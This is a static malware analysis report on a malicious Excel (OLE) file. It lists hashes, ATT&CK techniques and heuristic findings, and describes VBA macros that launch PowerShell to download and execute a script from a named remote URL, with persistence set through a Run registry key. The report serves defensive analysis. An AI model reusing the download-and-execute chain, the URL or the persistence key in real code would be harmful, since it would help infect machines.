Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 19336c830f9d53df…

MALICIOUS

Office (OLE) / .XLS

124.0 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2022-09-13
MD5: 8cf68abcb86481f0dec08fb6a982046c SHA-1: 70e3554c03b309aa328d872c00e4a12f9008f7f9 SHA-256: 19336c830f9d53df82c43650dca69b1e6c8c51d69941baed232fef1928a927ae
100 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that leverage ShellExecute to run a PowerShell command. This PowerShell command is designed to download a JavaScript file from 'http://ddapoknet.ug/ups/pu/yaw.sbv/yaw.sbv' and execute it. The script also attempts to establish persistence by writing to the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'. The presence of these elements strongly indicates a downloader or initial access mechanism.

Heuristics 3

  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
756fbacdf78f2ce41f223e340dcae3250cc9a94275bffd341a5cda687967d0bd		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 1424 bytes
ole10native_00.bin
74b3118d3e61f0e439d04780cac607d5f288e9b79dfd2f472e242994aa016a48		 ole-package OLE Ole10Native stream: MBD03936731/Ole10Native 1318 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.